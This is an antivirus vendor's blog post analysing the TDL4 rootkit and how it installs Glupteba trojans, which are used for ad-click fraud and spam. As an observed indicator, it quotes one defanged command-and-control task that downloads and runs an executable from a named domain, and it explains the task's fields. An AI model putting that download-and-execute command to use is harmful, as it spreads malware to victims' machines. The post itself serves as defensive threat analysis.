Back to Home

TDL4 Botnet for rent? / ESET NOD32 Blog

ESET · rootkits · tdl4 · Win32 · Olmarik · Glupteba

TDL4 Botnet for rent?

    Not so long ago, we noticed an interesting feature in some new TDL4 rootkit samples (Win32 / Olmarik.AOV). If someone does not know, this rootkit has managed to hold the title of the most technologically advanced mass malicious program for several years now. This is the first full-fledged rootkit for x64, which managed to bypass the digital signature verification and PatchGuard to get into the kernel on 64-bit systems.

    The fact is that after their successful installation, some instances of this rootkit are installed in the system of Trojans from the Win32 / Glupteba family. This suggests that the resources of this botnet began to be rented out. It is also interesting that there is no further interaction between the Win32 / Glupteba and TDL4 bots.

    So, immediately after successful installation and identification, the TDL4 bot receives the following command from C & C:

    task_id = 2 | 10 || h ** p: //wheelcars.ru/no.exe You can

    interpret it as follows:

    task_id = [command_id] [encryption_key ] [URL]

    In our case, the set of parameters coincides with the “DownloadAndExecute” command, because the encryption key is zero, and the command identifier is 2, and then the number of attempts to execute it is ten.

    After installing on a system, Win32 / Glupteba receives the task from its C&C and starts its execution.

    image

    Most often, the bot receives two types of tasks: the first is the clicking of contextual advertising from the Begun advertising network, and the second is spamming. Let's take a closer look at what this bot does.

    In the first case, a large number of specially formed web pages are visited, the filling of which provokes the appearance of a certain type of contextual ads. Moreover, all the web pages from which the click occurs are located on the servers of the provider Masterhost.

    image

    If you look at the statistics of network accesses of a clicking bot, it looks as follows:

    image

    The TDL4 botnet itself, like its predecessor, is also actively monetized through black methods for promoting websites and spoofing search results in popular search engines.

    Read Next